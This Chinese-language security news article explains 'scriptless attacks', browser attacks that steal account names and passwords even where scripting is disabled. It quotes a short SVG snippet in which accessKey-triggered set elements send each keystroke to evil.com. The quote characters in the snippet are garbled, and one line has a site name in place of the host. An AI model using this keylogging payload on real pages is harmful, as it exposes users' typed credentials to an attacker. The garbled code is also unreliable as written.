由于企业安全意识和技术水平的不断提升,针对服务器端的攻击变得越来越困难,这些年 黑客 越来越重视客户端攻击技术的运用,跨站脚本攻击(XSS)就是其中研究和运用较多的一种技术。为了防范类似的攻击,安全机构研究出了各种检测恶意脚本的方法,Firefox甚至推出了 NoScript插件完全阻止客户端脚本的运行(除非客户端明确授权)。
最近,有国外研究人员提出了客户端无脚本攻击(Scriptless Attacks)技术,在客户端完全禁止脚本运行的情况下,也能实现客户端帐号、口令等敏感个人信息的窃取,这种新的攻击技术的出现立刻引起了安全人士的浓厚兴趣。
那么,攻击者如何在客户端完全禁止脚本运行的条件下实现攻击呢?其实这跟 浏览器 越来越丰富的功能有关。比如SVG可缩放矢量图形(Scalable Vector Graphics),这是国际互联网标准组织W3C提出的基于可扩展标记语言(XML),用于描述二维矢量图形的一种图形格式。使用SVG可以通过文本来实现图形的生成和处理,大大提高了浏览器在处理图像信息过程中的交互性和动态效果。Accesskey是SVG中定义的一个操作功能,当浏览器捕捉到击键信息时会触发这个功能,本意主要是提供图形操作的便捷方式,不过利用这个功能,攻击者也就很容易实现恶意的击键记录。以下是实现击键记录的部分代码片段,来自 http://web2hack.org/blog/?p=89 :
<set attributeName=]xlink:href] begin=]accessKey(a)] to=]//evil.com/?a] />
<set attributeName=]xlink:href] begin=]accessKey(b)] to=]//evil.com/?b] />
<set attributeName=]xlink:href] begin=]accessKey(c)] to=]// www.2cto.com /?c] />
<set attributeName=]xlink:href] begin=]accessKey(d)] to=]//evil.com/?d] />
以上只是无脚本攻击的一个典型例子,攻击者还可以利用基于 CSS 的多种特效实现更多的攻击,由于篇幅所限就不在这里一一描述了
查看更多关于客户端无脚本攻击(Scriptless Attacks) - 网站安全的详细内容...